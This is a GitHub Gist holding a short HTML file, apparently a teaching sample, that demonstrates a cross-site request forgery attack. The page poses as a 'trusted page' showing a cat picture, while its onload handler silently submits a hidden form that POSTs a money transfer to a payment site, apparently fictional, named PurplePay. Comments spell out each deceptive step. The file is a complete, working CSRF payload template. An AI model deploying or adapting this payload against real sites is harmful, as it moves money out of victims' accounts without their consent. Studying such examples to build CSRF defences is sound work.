Created
August 11, 2020 02:24
-
-
Save ahmedsakr/dccaab922b6e4088cff3c165f8a39038 to your computer and use it in GitHub Desktop.
A sample HTML page that can carry out CSRF attacks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <header> | |
| <title>I'm a trusted page</title> | |
| </header> | |
| <!-- Immediately dispatch the forum when we load--> | |
| <body onload="document.hackform.submit()"> | |
| <!-- Nothing suspicious... show the user a happy cat! --> | |
| <img src="happycat.jpg" alt="I am a happy cat" /> | |
| <!-- But silently, let's submit a POST request to hijack some money from the user's PurplePay--> | |
| <form style="display: none" name="hackform" method="POST" action="http://purplepay.com/send-money"> | |
| <input name="name" value="Bill Gates" /> | |
| <input name="amount" value="50" /> | |
| </form> | |
| </body> | |
| </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment